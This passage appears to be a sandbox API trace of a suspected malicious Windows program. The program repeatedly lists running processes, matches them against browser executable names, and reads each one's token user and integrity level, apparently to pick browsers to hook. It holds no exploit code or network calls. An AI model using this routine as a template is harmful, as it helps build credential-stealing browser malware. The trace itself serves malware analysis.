(lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0468.229] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0468.229] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0468.229] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0468.229] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0468.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0468.229] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0468.229] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0468.229] GetLastError () returned 0x7a [0468.229] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0468.229] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0468.229] CloseHandle (hObject=0x3bc) returned 1 [0468.229] CloseHandle (hObject=0x5a4) returned 1 [0468.229] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0468.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0468.229] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376520, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">Y") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0468.229] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0468.229] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0468.229] GetLastError () returned 0x7a [0468.229] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0468.229] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0468.229] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0468.229] CloseHandle (hObject=0x3bc) returned 1 [0468.229] CloseHandle (hObject=0x5a4) returned 1 [0468.230] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0468.230] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0468.230] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0468.230] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0468.230] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0468.230] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0468.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0468.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0468.230] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0468.230] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0468.230] GetLastError () returned 0x7a [0468.230] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0468.230] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0468.230] CloseHandle (hObject=0x3bc) returned 1 [0468.230] CloseHandle (hObject=0x5a4) returned 1 [0468.230] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0468.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0468.230] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376b68, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">Z") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0468.230] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0468.230] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0468.230] GetLastError () returned 0x7a [0468.230] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0468.230] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0468.230] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0468.230] CloseHandle (hObject=0x3bc) returned 1 [0468.230] CloseHandle (hObject=0x5a4) returned 1 [0468.230] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0468.230] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0468.230] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0468.230] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0468.230] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0468.230] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0468.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0468.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0468.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0468.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0468.231] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0468.231] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0468.231] GetLastError () returned 0x7a [0468.231] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0468.231] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0468.231] CloseHandle (hObject=0x3bc) returned 1 [0468.231] CloseHandle (hObject=0x5a4) returned 1 [0468.231] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0468.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0468.231] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376f10, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">[") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0468.231] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0468.231] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0468.231] GetLastError () returned 0x7a [0468.231] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0468.231] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0468.231] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0468.231] CloseHandle (hObject=0x3bc) returned 1 [0468.231] CloseHandle (hObject=0x5a4) returned 1 [0468.231] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0468.231] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0468.231] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0468.231] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0468.231] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0468.231] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0468.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0468.231] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0468.232] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0470.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa798) returned 0xc0000004 [0470.238] VirtualAlloc (lpAddress=0x0, dwSize=0xb798, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0470.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb798, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0470.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0470.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0470.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0470.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0470.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0470.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0470.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0470.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0470.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0470.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0470.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0470.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0470.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0470.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0470.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0470.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0470.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0470.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0470.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0470.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0470.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0470.242] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0470.243] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0470.243] GetLastError () returned 0x7a [0470.243] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0470.243] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0470.243] CloseHandle (hObject=0x3bc) returned 1 [0470.243] CloseHandle (hObject=0x5a4) returned 1 [0470.243] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0470.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0470.244] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x3780e8, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\\") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0470.244] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0470.244] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0470.244] GetLastError () returned 0x7a [0470.244] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0470.244] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0470.244] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0470.244] CloseHandle (hObject=0x3bc) returned 1 [0470.244] CloseHandle (hObject=0x5a4) returned 1 [0470.245] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0470.245] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0470.245] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0470.245] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0470.245] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0470.245] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0470.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0470.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0470.246] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0470.246] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0470.246] GetLastError () returned 0x7a [0470.246] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0470.246] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0470.246] CloseHandle (hObject=0x3bc) returned 1 [0470.246] CloseHandle (hObject=0x5a4) returned 1 [0470.247] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0470.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0470.247] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x375d60, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">]") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0470.247] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0470.247] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0470.247] GetLastError () returned 0x7a [0470.247] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0470.247] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0470.247] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0470.248] CloseHandle (hObject=0x3bc) returned 1 [0470.248] CloseHandle (hObject=0x5a4) returned 1 [0470.248] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0470.248] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0470.248] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0470.249] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0470.249] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0470.249] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0470.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0470.249] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0470.249] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0470.249] GetLastError () returned 0x7a [0470.249] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0470.249] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0470.249] CloseHandle (hObject=0x3bc) returned 1 [0470.250] CloseHandle (hObject=0x5a4) returned 1 [0470.250] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0470.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0470.250] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376520, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">^") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0470.250] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0470.250] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0470.250] GetLastError () returned 0x7a [0470.250] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0470.250] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0470.251] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0470.251] CloseHandle (hObject=0x3bc) returned 1 [0470.251] CloseHandle (hObject=0x5a4) returned 1 [0470.251] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0470.252] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0470.252] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0470.252] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0470.252] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0470.252] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0470.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0470.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0470.252] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0470.252] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0470.252] GetLastError () returned 0x7a [0470.252] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0470.253] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0470.253] CloseHandle (hObject=0x3bc) returned 1 [0470.253] CloseHandle (hObject=0x5a4) returned 1 [0470.253] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0470.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0470.253] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376b68, 